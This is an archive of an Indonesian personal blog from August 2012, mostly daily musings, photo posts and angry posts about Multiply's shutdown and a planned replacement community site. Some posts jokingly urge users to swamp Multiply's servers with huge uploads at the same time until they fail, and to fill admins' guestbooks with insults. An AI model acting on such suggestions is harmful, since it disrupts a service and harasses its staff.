Rabu, 29 Agustus 2012
Selasa, 28 Agustus 2012
Insomnia
Salah satu jurus mudah tidur adalah, membayangkan pendakian yang dingin, di tengah malam, tidur di dalam tenda yang agak hangat, dilapis sleeping bag. Tidak sampai 5 menit, dijamin ilang. Atau membayangkan naik bis nyaman dalam sebuah perjalanan malam, dengan suasana temaram.. Wenak tenan
Namun semalam agak aneh.. Saya berusaha tidur, ternyata tidak bisa.. padahal tidak mikir apa-apa dan juga internet posisi telah mati, berikut laptop saya. OFFLINE. Sambil bergumam : "Hai Insomnia, rasain jurus BIS ku".. Eh bis sudah jalan dari Solo sampai Bandung, Insomnia masih ada... Lantas, saya pun mencoba jurus lain : "Nih jurus pendakian Dieng - Sindoro - Sumbing.. dijamin auto tidur".. Ternyata setelah autonaikturun Sindoro Sumbing dua kali dengan sleeping bag yang amat enak, justru malah kaki saya ikutan capek.. dan sama sekali tidak tidur... Wah, semalam adalah insomnia yang kurangajar...
Semoga nanti malam tidak lagi seperti itu.. malas ikut-ikutan para alay membuat status Insomnia..
Minggu, 26 Agustus 2012
0.999999999.... = 1 ???
x = 0.999999999...
10 x = 9.999999999...
10 x - x = 9.999999999... - 0.999999999...
9 x = 9
x = 1
0.999999999... = 1
Dimana kesalahannya
Sabtu, 25 Agustus 2012
12 : 2 ( 1 + 1 ) * 3 =
12 : 2 ( 1 + 1 ) * 3 =
a. 1
b. 9
c. 36
d. 0
Jumat, 24 Agustus 2012
Kamis, 23 Agustus 2012
Hentikan Terminologi "Tangan Baik" "Tangan Buruk"
Saya sangat yakin bahwa masalah kanan dan kiri adalah merupakan adat turun temurun yang tidak cuma di tanah Arab dan juga Indonesia. Bahkan di seluruh dunia. Berjabat tangan, di manapun, tetap akan menggunakan tangan kanan. Agama berfungsi untuk menegaskan bahwa kesopanan dan menghormati orang lain, dan juga membiasakan memisahkan pekerjaan kotor dan makan, akhirnya muncul semacam anjuran penggunaan sisi organ tubuh kita tersebut. Kiri dan kanan. Saya kurang tahu, apakah para left-handlers(kidal) dan ortodox muncul akibat dibiasakan, atau memang sejak kecil memiliki kecenderungan penggunaan organ kiri dan kanan. Karena ternyata binatangpun memiliki sisi organ kanan yang lebih dominan.
Saya agak menyayangkan masalah kiri dan kanan yang akhirnya berkembang di pengajaran anak secara salah. Pengajaran anak untuk mendominankan tangan kanan dan menomorduakan tangan kiri dengan istilah : TANGAN MANIS dan TANGAN JELEK. TANGAN TUHAN dan TANGAN SETAN. ASTA MANIS dan ASTA ELEK.
Mengapa akhirnya organ tubuh kita yang sebelah kiri dikatakan sebagai organ yang jelek? Harusnya sungguh BERSYUKUR kita dikaruniai organ yang lengkap. Adakah yang bisa menjawab? Bisakah kita kelak di kemudian hari mengajarkan pada anak tidak secara berlebihan. Penggunaan tangan kiri dan kanan itu ya karena pembedaan tugas saja, bukan karena kanan lebih baik dari pada kiri. Bahkan dalam beberapa wacana, terdapat dugaan bahwa Rasulullah SAW sebenarnya adalah orang yang sangat seimbang menggunakan kiri dan kanan. Terdapat salah satu hadits dari Aisyah kurang lebih sebagai berikut: "Beliau menggunakan dan mendahulukan bagian kanan untuk makan, minum, berjabat tangan, menggunakan pakaian dan masuk masjid dan menggunakan bagian kiri untuk selain itu". Kata selain bisa jadi lebih banyak dari yang disebut. Bahkan dalam satu riwayat, Rasulullah menggunakan pedang ketika berperang adalah dengan tangan kiri.
Setujukah jika kita mulai sekarang tidak lagi mengatakan "tangan baik" "tangan buruk" dan akhirnya justru menganggap jelek orang-orang yang kidal?
Tentang kiri, saya pernah post di
http://bimosaurus.multiply.com/journal/item/738/KIRI
dan kidal di
http://bimosaurus.multiply.com/journal/item/321
Selasa, 21 Agustus 2012
[Isu Ramai] Mobil Siapa Ini
Dapat di berbagai media sosial. Konon sih mobil ini digunakan untuk mudik. Tapi entah digunakan buat mudik atau nggak, dan posisi juga tidak jelas, namun satu pelanggaran jelas adalah penggantian warna.
BTW: Hmm si pemotret dalam posisi mengemudi nggak ya??
Jangan lupa cek ke sini atau mungkin ada url lain?
http://www.dispenda.jabarprov.go.id/index.php/learning/infokb
Cek nomer untuk plat merah...
Hasilnya
Lantas cari nomer yang sama untuk plat hitam
Hasilnya
Lumayan ya, bisa dapat premium.. Padahal netter berjuang kejar pertamax. Nah, tentunya mobil jenis ginian banyak banget ya... Pada pinter ngakalin rakyat.. hati-hati sekarang kamera dimana-mana..
Senin, 20 Agustus 2012
CAPITALISM
Pohon dan lapangan adalah Multiply masa lalu..
Orang bertopi koboi adalah mulpid dan pihaknya..
Tafsirkan masing-masing..
Gambar ini saya dapat dari sebuah group Developer sebuah situs perkawanan sosial..
Momen Tepat Untuk Memahami Sebuah Resiko Pergaulan
Hari ini, saya, atas nama pribadi maupun keluarga, mengucapkan :
Selamat Hari Raya Idul Fitri bagi teman-teman yang merayakannya, dan sekaligus saya memohon maaf lahir bathun atas segala perilaku wicara yang tidak berkenan di hati teman-teman semua.
Minal Aidin Wal Faidzin, semoga kita berjumpa lagi dengan Ramadan berikutnya
bimosaurus
Sabtu, 18 Agustus 2012
Jumat, 17 Agustus 2012
Kamis, 16 Agustus 2012
Tidak sukanya saya dengan tradisi di bulan Ramadan dan tradisi Lebaran
- Takut mati kelaparan. Pelaku puasa (tidak cuma orang Islam) menjadi takut mati kelaparan. Biasanya makan sehari dua kali cukup sepiring-sepiring, bulan Ramadan menjadi over. Alasannya menjaga kebugaran ketika puasa. Sahur over dengan 'ngeladuk kurang deduga' karena takut nanti siangnya lapar, dan buka dengan memasukkan segala yang mungkin masih bisa masuk, dengan alasan mengganti nutrisi tubuh. Biasanya juga ndak apa apa..
- Aji mumpung untuk makan enak. Biasanya kolak juga tidak harus, makanan-makanan yang tidak biasa juga tidak harus, tetapi justru di dalam bulan Ramadan, kolak harus ada, makanan-makanan manis juga harus ada. Padahal ajarannya cukup: "berbukalah dengan air"
- Acara-acara tidak karuan. Acara yang sering disebut dengan ngabuburit dan lain sebagainya, thongkrong dan kongkow tidak jelas, adalah salah satu alasan saya tidak suka dengan tradisi di bulan Ramadan. Kadang bahkan ada acara maut seperti balapan motor bodong dan lain sejenisnya. Acara buka bersama kadang diadakan sekedar acara makan bersama. Sering ditemui bahwa acara buka bersama justru melalaikan kewajiban sholat Magrib. Bahkan lucunya, Ramadan saja kadang belum diputuskan kapan.. tetapi justru acara buka bersama sudah lengkap 30 hari
- Lalu lintas kacau. Menjelang Maghrib, orang seperti kesetanan untuk pulang, takut tidak kebagian. Sehingga jalan pada ngebut-ngebut dan pada sok-sokan. Pengalaman seorang saudara saya kecelakaan motor gara-gara kondisi menjelang magrib ini.
- Mushola dan masjid mengeraskan suara keluar hingga taraf mengganggu. Saya suka suasana syahdu seperti daerah pesantren. Namun kadang masjid-masjid kota justru yang biasanya sepi, di hari-hari bulan Ramadan mengeraskan suaranya hingga taraf mengganggu. Pengalaman tinggal di sebelah masjid di daerah Surokarsan dulu, masyarakat sekitar masjid dijamin susah untuk istirahat. Sementara kondisi kakek saya dulu adalah perlu istirahat. Pagi jam 2 sudah dibangunkan sahur dengan keras. Hingga kuliah subuh, dan setelah itu lagu-lagu islami dikeraskan. Pasca dhuhur ada wiridan juga dikeraskan. Ashar hingga magrib pengajian tidak henti dilepas dengan TOA. Isya, tarawih, dan hingga tadarrus Quran hingga jam 11-12 malam.
- Heran juga dengan suara petasan. Saya pernah mencoba sesekali beli petasan untuk anak saya harganya sekitaran 8-10 ribu. Saya setiap malam bisa dengar petasan dari orang-orang yang thongkrong di jalan depan rumah bisa dari jam magrhib sampai tengah malam. Cukup kaya sepertinya. Sementara efek gangguan terasa ke seluruh warga
- Acara televisi yang katanya acara makan sahur atau lain-lainnya, justru penuh dengan acara pelecehan orang lain dan justru mengajarkan cara hidup yang tidak benar. Acara macam ini justru menampilkan artis yang berpenampilan dan bersikap tidak sesuai dengan jenis kelaminnya.
- Sweeping tempat makan di jam siang. Ini adalah perihal bodoh. Seharusnya orang puasa adalah menahan diri. Bukan lantas orang lain yang diminta peduli. Syukurlah Wonosobo tahun ini warung tetap buka. Sweeping warung itu tidak hanya berefek buruk bagi orang yang tidak beragama Islam. Namun justru orang yang sedang berhalangan, akan makin sulit mencari tempat makan. Padahal orang status berhalangan adalah orang yang seharusnya dimudahkan.
- Mudik, mau tidak mau sudah menjadi keharusan. Ini adalah tradisi. Bagi orang macam saya, jelas repot, ketika mudik ke mertua jauh, yang keluarga sendiri merasa dianggap kita berlaku berat sebelah. Padahal mudik jelas di tingkat nasional saja sudah membawa efek lumayan berat.
- Harus pakaian baru, serba mahal, sekedar untuk kelihatan. Ini pun tradisi yang sudah susah diubah.
- Acara silaturahim baik kampung maupun keluarga, justru membuka lembaran gunjingan baru. Pakaian dan perhiasan yang ditampakkan akan memancing perlombaan 'wah'. Saling pamer apapun yang dipunyai.
- Menjelang dan setelah Ramadan, jalan menjadi kotor karena petasan. Harusnya segala macam gangguan itu tidak ada, jika benar-benar konsep Rahmatan Lil Alamiin diterapkan. Saya saja yang beragama Islam terganggu, apalagi yang bukan.
- Boros. Dari beberapa point di atas, yang paling terasa adalah boros. Segala hal berusaha dibeli untuk momen Ramadan dan Lebaran.
- Malas. Orang menjadi punya alasan untuk malas. Seperti saya pun terkena efek juga. Misal, biasanya di hari biasa, tidur saja cukup 4 jam. Namun justru di bulan puasa bisa lebih banyak melakukan tidur dengan alasan mengantuk karena malam sahur. Di tingkat instansi lebih terasa ketidak efektifannya.. baik instansi pemerintah maupun swasta.
- dan masih banyak lagi.
Saya kadang berharap, suatu ketika berlebaran di suatu tempat bersama keluarga sendiri, dan justru terdapat kerinduan, baik merindu atau dirindu dengan kampung halaman baik kampung halaman di tempat orang tua dan mertua. Saya juga kadang berharap, puasa Ramadan itu seperti orang berpuasa sunnah. Tidak perlu terlihat dan berefek gangguan apapun terhadap lingkungannya. Nah itu adalah curhat versi saya. Wallahua'lam
Rabu, 15 Agustus 2012
Perjuangan dalam berbagai bentuk
Dengan demikian siapapun yang mengadakan perjuangan perlawanan, hanya ada dua kata : Merdeka, atau Mati. Jikalau sampai kalah, maka sang pejuang hanya akan menjadi kerbau seretan sang penjajah. Maka dari itu, muncul kata : "Lebih baik mati berkalang tanah, daripada hidup bercermin bangkai". Jikalau si pejuang kalah, maka orang yang berpihak pada musuhlah yang akan menjadi pahlawan. Selain pejuang melawan penjajah, dan pejuang berpihak/dibayar pada penjajah, ada juga orang yang memiliki posisi abu-abu, yaitu hanya akan mengambil keuntungan dari hasil pemanfaatan situasi. Ketika A menang, maka dia akan mendekati A, menjilat habis, dan begitu juga jika A kalah.
Perjuangan, memiliki bentuk sesuai dengan karakter, pola berpikir, dan kemampuan masing-masing. Ada kaum moderat yang memilih sedikit memberi toleransi kooperatif pada pihak musuh, ada juga radikal yang memilih non-kooperatif sama sekali. Ada juga yang memilih berjuang dengan caranya sendiri, seperti misal berjuang di sisi kemanusiaan. Siapapun yang sakit maka dia tolong. Semua memiliki bentuk tersendiri. Perjuangan jaman Rasulullah pun juga memiliki berbagai dinamika seperti itu. Pengkhianatan juga mewarnai cerita perjuangan sebuah bangsa. Pengkhianatan adalah bahasa dari sisi lain. Dari sisi yang memihak adanya pengkhianatan akan dinamakan tipu muslihat. Seperti yang dilakukan oleh Salman Al Farisi ketika memecah belah Yahudi. Tidak masalah bagi kita melihat Salman Al Farisi, selama dia memiliki sikap dan siap memikul resiko tatkala dia kelak dalam posisi kalah, pasti dia akan menjadi sasaran pertama. Sikap, menjadi sangat berperan penting dalam nilai sebuah perjuangan, entah kita akan menjadi siapapun. Apakah akan berjuang pada pihak tertentu, atau kita akan berpihak pada diri sendiri saja.
Para pahlawan bangsa, entah sudah mendapat gelar pahlawan atau belum, seperti Pak Karno, Pak Sudirman, Pak Hatta (bukan pake Rajasa) , Pak Urip dan sebagainya adalah orang yang harusnya menjadi panutan sikap dalam perjuangan bangsa kita, jika kita memang merasa cocok berpihak dengan mereka. Boleh saja mengatakan mereka adalah penjahat beruntung, jika kita adalah orang yang merasa ada di sisi seberang perjuangan mereka.
Namun, siapapun mereka, kita akan melihat bahwa tanggal 17 Agustus kelak, bangsa ini baru 67 tahun menyatakan merdeka. Banyak selebrasi seremonial yang akan digelar oleh mereka, entah ketabrak momen Ramadan atau tidak. Kadang ada yang memasang bendera di puncak Gunung Merapi, atau sekedar memasang bendera di kampung dan mengikuti tirakatan peringatan kemerdekaan, membuat rekor-rekor nasional dan internasional, permainan-permainan rakyat, atau bahkan melakukan vandalisme mengingat bahwa bangsa kita dulu juga suka mengorek-orek MERDEKA ATAOE MATI, atau model lain yang unik.
Di kampung saya, tentu orang macam bapak saya, akan selalu diminta bercerita tentang masa perjuangannya. Bapak saya adalah salah seorang pejuang 45 yang tergabung dalam Korps Cacad Veteran RI. Dalam suatu rapat Korps Cacad Veteran di suatu tempat, tiba-tiba kita bisa membayangkan bahwa orang-orang macam itu adalah orang yang memiliki sikap tegas pada diri sendiri untuk menolak dijajah. Resiko mereka jelas, jika kalah mereka habis. Jika menang, kelak mereka juga akan terlupa dalam sejarah. Mereka tidak butuh gelar pahlawan. Mereka hanya sekedar berjuang. Memberontak.
Selamat Hari Kemerdekaan RI 17 Agustus kelak. Semoga kita semua makin bisa mempelajari para pejuang bangsa ini dengan tetap memiliki sikap tegas, mau kemana kita.
bimosaurus - Ganti HetSot Merah Putih
gambar dari : sini
Hmm MP masih berani ngiklanin Premium Account? Bebal...
Kok ya masih ngiklanin kata-kata ini:
Hi-Def Video - Upgrade to Multiply Premium
Sibuk tepe-tepe pencitraan kayaknya
Selasa, 14 Agustus 2012
Dasar Kaum Lebay
Setengahnya saya protes ketika kekompakan kita dikatakan lebay.. Namun ternyata sebenarnya mereka yang mengatakan itu pernah memberikan pernyataan sejenis seperti ini "Salut pada blogger MP yang memiliki kebersamaan tinggi" Itu ditujukan kepada seluruh teman MP ketika almarhumah Nita dipanggil Yang Kuasa.
Sekarang pun saya dikatakan lebay akan hal ini, yaitu cawe-cawe kecewa akan hilangnya taman bermain kita ini, biarkan saja.. Saya masih ingat ketika `jenat-e` Friendster tutup, tidak ada orang protes, Demikian juga koprol harus tidak lagi dipegang yahoo.. Tidak ada yang protes. Tapi MP, protes setengah mati, sampai segala macam pisuhan sumpah serapah muncul di blog group Multiply yang diposting oleh Stefan.
Saya sangat yakin, siapapun orang luar yang mengatakan lebay, tentu ketika dia ada di dalam lingkaran kebersamaan kita yang sudah terlalu dekat, maka dia juga akan menjadi seperti yang dia katakan itu..
Wis, lebay yo ben.. lanjut berjuang!
Senin, 13 Agustus 2012
Urun Gambar : Dieng, My Mistical Fog
Saya sering melarikan diri ke Dieng ini. Jaman sekolah saya kadang minggat dari sekolah dan lari ketempat ini dengan numpang truk lewat.
Dieng ini mengandung misteri besar sejarah bangsa ini. Nah, siapa yang mau bermain di Dieng antara jam 2 - 6 pagi bulan Juni hingga September, akan banyak menemukan defrosting, alias bun upas. Sebuah embun yang berasal dari kabut yang sedikit mengandung belerang. Sepintas, akan seperti salju.. Dia membeku pukul dua malam. Sedangkan pukul 6 ketika telah terang, tapi matahari belum tampak, tertutup Sindoro.. Maka, es dan kabut misteri tersebut akan membentuk pemandangan amat indah..
Seminggu lalu saya ke tempat ini.. Namun langsung menuju ke kawah sileri. Minggu ini saya bersama cak Nono main ke tempat ini, maka jangan heran kalau menemukan album bombing yang sama... :)
Bermain ke tempat ini jam 6 pagi jelas membutuhkan pengorbanan. DINGIN setengah mati hingga seluruh jari tidak terasa lagi.. Pegang kamera dengan baik, itu sudah beruntung.. Tapi... itupun rela, untuk dapat gambar semacam ini...
Buat teman-teman yang butuh ojek main Dieng, buat teman MP , untuk hibur hati, oke lah gratis :)... Namun buat staff MP, boleh gratis plus masuk ke Jurang desa Sembungan.. Biar dimakan wewe
Urun Gambar : Menjer.. My Mistical Lake
Telaga ini, di masa lalu adalah tempat tidur siang saya.. Tatkala Zaki pasca lahiran dan selama beberapa bulan di Karawang, saya senantiasa menghibur rindu di telaga ini. Sebuah danau nan indah, teduh, dan tenang....
Minggu, 12 Agustus 2012
Urun Gambar : Sunrise Tieng 8 Agustus 2012 vs Sunrise Kledung 12 Agustus 2012
Mentari belum terbit.. Motor yang tadinya kupacu tanjak di dalam kabut, berakhir dengan berhenti di atas awan...
Bergaul dengan dingin pagi, menembus kelamnya fajar, berhenti diatas awan..
Menyaksikan terbit mentari, selalu membawa semangat nan baru..
Silakan bandingkan gambar sunrise yang saya dapatkan tanggal 8 Agustus 2012 dengan posisi Gardu Pandang Tieng (Bawah Dieng persis) vs Kledung Pass 12 Agustus 2012.
TIENG 8 Agustus 2012
Posisi saya persis di atas jurang, di atas awan.. Unbelievable moment.. menyaksikan mentari muncul dari balik ufuk, menerpa pegunungan Dieng dan Gunung Sindoro. Desa yang terletak persis di bawah kaki saya, sedang dilanda kabut alias awan...
KLEDUNG PASS 12 Agustus 2012
Sambil mengantar bung Denden saya memilih berhenti di Kledung Pass, menyaksikan mentari yang harus muncul dari balik kabut... Bulat mentari benar-benar tidak menyilaukan disaring sang kabut fajar... Unbelievable moment!!
Berikut gambarnya....
Sabtu, 11 Agustus 2012
BLOG NITA
Mulpid memang tidak pernah memikirkan usaha yang bermanfaat buat orang lain. Profit kapitalis adalah tujuannya. Betapa SEO Blog Nita sangat baik, raga dia memang mati, tapi luar biasa semangat dan jiwanya. Taggingnya keren sekali. Saya punya dotkom saja tidak pernah sampai seperti Nitafebri. Google saja masih mensuggest. Dari sini kita juga tau betapa banyak orang yang masih butuh postingan ini. Melihat ini saya malah menjadi marah kembali pada mulpid. Tapi ya sudah.. memang jiwa mulpid memang busuk.
Adakah teman yang sudah membackup? Sepertinya sangat penting membackup. Kelak kalau `kapal tampungan` telah siap, akan kita berikan ruang sendiri untuk orang-orang yang masih membutuhkan nitafebri.
Jumat, 10 Agustus 2012
Re-UNION di Republik Multinesia!!
Baik teman-teman yang sudah pada memindahkan barang-barang ke wordpress atau blogspot, saya ucapkan selamat ngeblog dimanapun kita berada. Sepertinya untuk masalah backup blog dan comment tidak ada masalah disana. Mungkin yang akan menjadi masalah adalah : photos, review, links, event, music dan videos. Di Wordpress juga tidak mudah mengkustom tampilan, karena kondisi berbayarlah yang dapat melakukan kustomisasi. Untuk Blogspot, jauh lebih enak melakukan kustomisasi. Namun demikian saya dan teman-teman lain masih berharap bahwa kesatuan kita jangan sampai tercerai berai. Kita tahu Multiply telah menyatukan kita. Namun juga pasar sampah Multiply juga yang telah mencerai beraikan kita.
Saya dan beberapa teman menawarkan agar kita juga melakukan `backup perkawanan` kita lebih dulu di http://republikmultinesia.com. Halaman tersebut sementara masih dalam masa config dan trial. Untuk sementara teman-teman boleh mendaftar nama lebih dulu di http://oot.republikmultinesia.com yang kemarin sempat disounding dengan nama forummp.bimosaurus.com. Bagi yang telah mendaftar di forummp, sudah secara otomatis terdaftar di oot.republikmultinesia.
Dengan sekuat tenaga saya dan beberapa kawan akan melakukan pengembangan sistem web blog social networking lebih lanjut sebagai kapal sekoci teman-teman. Harapannya adalah, teman-teman yang sudah terlanjur satu hati, yang kemarin memiliki tempat bermain bersama dan harus hilang tempat bermain tersebut, segera memiliki tempat bermain bersama lagi. Tidak satu di jalan, satu di pasar jelek, satu di taman yang berbayar.
Harapan terkait bentuk sistem adalah mampu menampung seluruh postingan teman-teman baik yang berupa blog, notes, messaging, photos, events, reviews, links dan kedepannya adalah videos dan music. Namun karena keterbatasan server dan SDM yang ada sekarang, maka akan proses pengembangan mengalami tahapan. Blog akan lebih dulu diadakan dengan fitur halaman Dashboard untuk memfungsikan seperti Inbox kawan-kawan. Username akan dibentuk sebagai subdomain. Misal: bimosaurus.republikmultinesia.com. Username, akan kami usahakan agar yang sudah mendaftar di OOT.RM tidak perlu lagi mendaftar di http://republikmultinesia.com kelak jika telah selesai pengerjaan awalnya.
Kami serius dengan perkawanan teman-teman. Maka kami berusaha sekuat tenaga, setidaknya pasca Idul Fitri kita telah dapat bersilaturahim di tempat baru tersebut. Kami juga mengusahakan agar sistem tersebut tidak berbayar. Alias gratis. Tentang operasional dan sumberdaya hosting dan lain sebagainya, sementara kita masih model volunteer, dan hosting yang digunakan adalah sebuah server yang memiliki IP publik dengan bandwidth uplink yang cukup besar. Kita juga belum menentukan term of use. Tentu kita menunggu bertemu dengan teman-teman agar bisa sesuai hati teman-teman.
Kami harap kehadirannya sementara di REPUBLIKMULTINESIA. Kami pun berharap ada beberapa rekan yang siap membantu proses dari desain grafis, programming, kemampuan CMS dan lain sebagainya.
Kami harapkan tanggapan disini
ataupun
di oot.republikmultinesia.com
additional note: Maaf kami tidak menerima nama Daniel Tumiwa. Nama tersebut sudah jelas AUTODISABLED!
[Maremke Posting Multiply] Sampun ndalu
Start: | Aug 10, '12 1:00p |
Para sedherek,
dene wekdal sampun tengahing ndalu,
kamangka ing wayah sahur ngedahi ibadah,
lan mbenjing taksih kathah tanggel jawab lan gegarap,
Mangga dipun paripurna anggenipun dedamel,
Dipun tinggal wilcard DNS lan Virtual Host config ipun,
Dene sampun ngantuk,
Enggal dipun pejahi Laptopipun,
Mangga Gantosan mirsani TV
Yamaha: Rossi Kembali, Yamaha Semakin di Depan - KOMPAS.com
JAKARTA, Kompas.com - Yamaha Motor Company (YMC) secara resmi mengumumkan comeback Valentino Rossi, Jumat (10/8/2012). Kembalinya Rossi ditandai dengan tanda tangan kontraknya untuk tim Yamaha Factory Racing selama dua tahun, 2013 dan 2014.
Kabar teranyar ini pun disambut bahagia Yamaha Indonesia yang di hari yang sama tengah mengadakan acara Buka Puasa Bersama media dan rekanan bisnis di Hotel Borobudur. "Kembalinya Valentino Rossi dan menjadi rekan setim Jorge Lorenzo membuat Yamaha Semakin di Depan," ucap Dyonisius Beti, Executive Vice President Yamaha Indonesia.
Memori-memori indah Rossi bersama Yamaha memanggilnya pulang. Meskipun terpisah setelah Rossi hengkang ke Ducati di 2011, terbukti "The Doctor" kembali menambatkan hatinya ke tim "Garpu Tala". Indonesia pun punya tempat khusus di hati Rossi di mana fansnya sangat banyak di sini. Pebalap Italia itu pun berkenan mengunjungi para penggemarnya ke Jakarta pada 2009 dan setahun kemudian menyambangi Medan dan Surabaya.
Sementara itu, pernyataan resmi bergabung kembalinya Rossi diutarakan YMC melalui Lin Jarvis, Managing DIrector Yamaha Motor Racing. ”Pengumuman ini adalah berita sangat bagus bagi Yamaha. Di bulan Juni kami mendapatkan tanda tangan Jorge Lorenzo untuk tahun 2013 dan 2014 dan sekarang mengonfirmasi Valentino Rossi untuk dua tahun ke depan. Dengan begitu, kami dapat mengedepankan tim terkuat untuk meraih kemenangan dan mempromosikan brand Yamaha,” papar Jarvis.
Jarvis optimistis bergabung kembalinya Rossi semakin memperkuat misi Yamaha untuk merengkuh gelar di 2013 dan 2014. Disebutkannya, Yamaha sudah memiliki “super tim” di 2008, 2009 dan 2010 dan pada tiga tahun beruntun itu meraih “triple crown”, gelar di kategori pebalap, manufaktur dan Team World Championship. Target ke depannya pun jelas dan Yamaha sepenuhnya akan bekerja keras mencapai tujuannya.
"Tidak diragukan lagi, dengan pengalaman, pengetahuan, skill dan kecepatan dari dua pebalap juara dunia ini, kami dapat memenuhi tantangan meraih banyak kemenangan balapan dan titel 2013 dan 2014," tekan Jarvis.
"Tanda tangan Valentino melengkapi rencana ke depan untuk tim Yamaha Factory Racing MotoGP. Sekarang setelah semuanya terlaksana kami akan berusaha 100 persen untuk menyempurnakan pekerjaan dan mendukung Ben Spies dan Jorge Lorenzo dalam mengejar kemenangan balapan dan untuk gelar dunia 2012 bagi Jorge,” tegas Jarvis.
Rossi bergabung dengan Yamaha pertama kali di 2004 dan meraih 4 gelar juara dunia MotoGP, bersama tunggangan Yamaha YZR-M1 di 2004, 2005, 2008 dan 2009. Dia memenangi 46 Grand Prix dengan Yamaha lebih dari 7 tahun lamanya sebelum pergi di 2011.
Rossi yang sementara ini ada di posisi 8 klasemen, akan menjadi rekan setim Lorenzo yang saat ini memimpin tabel MotoGP dengan keunggulan 23 poin dari Dani Pedrosa. Juara dunia 2010 tersebut menuai 5 kemenangan dari 10 seri yang sudah dilakoni.
Langkah Rasional...
Tentu hari-hari ini bakal menyesakkan dada. Apa yang dulu kita ikuti, kita sanjung, kita cintai, kita klaim dan bandingkan lebih baik dari yang lain, ternyata tidak lagi bisa kita andalkan. Ini kenyataan yang terjadi. Saya ingat tahun 2008 an saya perbandingkan antara MP dengan Friendster. Secara fitur saya memang akui MP jauh lebih baik. Dari struktur Message Boardnya, halaman frontpagenya, hingga ke detail album, video dan lain sebagainya. Sampai-sampai review dan recipes saja diinclude kan ke dalam blog. Jelas sebuah social network yang humanis tidak sekedar mengandalkan celoteh seperti di mikroblogging. Meski pada akhirnya MP memasang fitur Quick Notes sebagai cara untuk memberi ruangan celoteh sekejap bagi membernya yang mungkin pada lari ke Facebook dan lainnya.
Fitur album foto memang keren. Sejak dulu MP sudah siap dengan online editing seperti rotating dan lain sebagainya. Kemudian bertambah lagi layanan Media Locker yang sangat memudahkan user melakukan management file dan posting. Dengan media locker sangat menghemat bandwidth bagi yang bakal melakukan uploading file yang sama. Fitur yang dikembangkan MP ternyata mempengaruhi user-usernya untuk dapat berkenalan dan akrab dengan orang yang semula mereka tidak tahu. Bahkan aksi protes yang sekarang muncul, sangat menunjukkan bahwa betapa akrabnya dan militannya hubungan antar teman-teman Multiply.
Seperti yang sudah kita alami, berbagai macam kejanggalan dan tragedi, seperti saat ini, saya yakin teman-teman pasti sangat kecewa. Bahkan ada juga yang marah. Namun sekali lagi ini kenyataan bahwa kita menggunakan service gratisan. Yang berbayar saja kena juga, apalagi gratisan. Memang jika kita lihat dengan :
- Service gratisan lain bisa mempertahankan membernya
- Janji-janji yang pernah ditawarkan oleh pembesar MP
- dan beberapa point lain
Namun menengok hal lain seperti :
- Kenyataan bahwa ini service gratisan, yang setiap saat kita bisa dihajar TOS
- Kenyataan bahwa si pembuat janji tercatat tidak menepati janji secara publik
- Kenyataan bahwa sejauh ini tidak ada tanggapan berupa statement yang berpihak pada para blogger ( OS juga yang ngeblog )
- Kenyataan bahwa di luar sana, `nuwunsewu` solidaritas sesama blogger belum bisa kita lihat hasilnya.
- dll
Sepertinya teman-teman memilih langkah rasional. Melakukan backup sendiri, mempersiapkan rumah di luar yang juga sebenarnya gratisan dengan beberapa langkah akan sukses. Atau mempersiapkan pertemuan dengan pihak MULPID. Atau juga mungkin ada yang punya rencana lain. Saya sendiri juga sedang mempersiapkan `backup perkawanan` yang intinya ingin kita berkumpul lebih dahulu dalam satu forum. Memang ada usaha pengembangan sebuah sistem web yang memiliki fitur aplikasi perkawanan sosial. Entah berwujud CMS ataupun Scratching Code. Sementara ini memang masih dicoba beberapa CMS yang sifatnya lebih bisa cepat terbentuk. Ada beberapa jenis seperti misal CMS Wordpress dengan fitur Multisite/Multiuser dicombine dengan buddypress, ada Livestreet, ada customized forum dan lain sebagainya. Namun dengan catatan bahwa banyak hal yang harus jauh berbeda dari MP.
Teman-teman, kita punya waktu hingga 1 Desember kelak. Kita masih ada waktu untuk saling bertukar kontak, masih bisa saling bertukar blog, dan apapun yang bisa ditukar. Teman-teman juga bisa menitipkan username di aplikasi yang kita devel, minimal di forumnya dulu. http://oot.republikmultinesia.com. Setidaknya ketika aplikasi web kita minimal blog dan album foto telah jadi, teman-teman bisa kembali bercengkrama seperti ketika di MP. Meski saya tidak yakin aplikasi yang akan dibuat bisa sama baiknya dengan MP yang akan dirusak oleh smagdali dan DT busuk itu.
Saking cintanya kita pada Multiply, sampai-sampai ketika cinta kita ditepis begitu saja, kita kesakitan, ternyata banyak yang bilang bahwa kita lebay.. Hehehe, bukan masalah lebay terhadap MP nya bukan? Tapi bagaimana ketika rekan-rekan menghadapi masalah bersama dalam komunitas ini seakan-akan benar-benar satu keluarga. Itu yang tidak ada di blogger lain. Lomba internal multiply, kuis emak-emak malam, kopdaran dan lain sebagainya. Ya satu-satunya cara paling enak, lepaskan saja, relakan saja itu berlalu. Toh kita kenal dengan yang namanya sakit hati. Ayo legawa, tetap semangat, buka langkah rasional, tetap saling menjaga.. Posting saja sampah-sampahan di MP yang berat-berat. Jangan lupa import video dari Youtube yang berukuran gede-gede.
Sudahlah, boleh bersedih, boleh marah. Lakukan tindakan yang lebih rasional. Entah apapun yang bisa didengar di dunia luar. Entah seperti kemarin ketika ada hacker marah gara-gara tempe akan susah terus nyikat situs deptan, atau segera membuat tampungan, saling kontak di G+, FB, Twit dan lain sebagainya. BLog juga banyak.. Segera sedikit-sedikit migrasi sendiri, karena tidak yakin juga orang yang telah cacat janji publiknya bisa memenuhi janjinya secara sempurna. Atau jangan lupa besok, 30 November, rame-rame menuliskan dalam guestbook para admin MP seribu kata : "BAJINGAN! "
Sekian, posting waton sing penting nyampah dan tetap posting
Kamis, 09 Agustus 2012
Lirik : Biar Semua Hilang
Akhirnya semua telah sirna
getar asmarapun pudar
di dalam dada
Dan diantara kita
t'lah tak ada rasa
saling seia sekata
Hari ini, atau esok lusa
kita kan berpisah
untuk selama-lamanya
Agar takkan lagi kurasa
duka derita hidup bersama
Reff.
Usah lagi
perpisahan jadi beban d hati
Takkan lagi
ada harapan kita tuk kembali
Biar semua hilang
bagai mimpi-mimpi
Biar semua hilang
usah kau sesali
Biar semua hilang
bagai mimpi-mimpi
Biar semua hilang
usah kau sesali
Download di http://multiply.com/m/item/bimosaurus:music:893
[Video] Dream Theater - Instrumedley
Saya pengin posting klip 12 menitan ini di video MP sudah tidak bisa. Entah server e mendem atau memang sudah disabled.. Tapi keren juga kalau 200an user saja melakukan bersamaan dengan video yang guwede2.. dijamin server e jadi co.id alias koit.
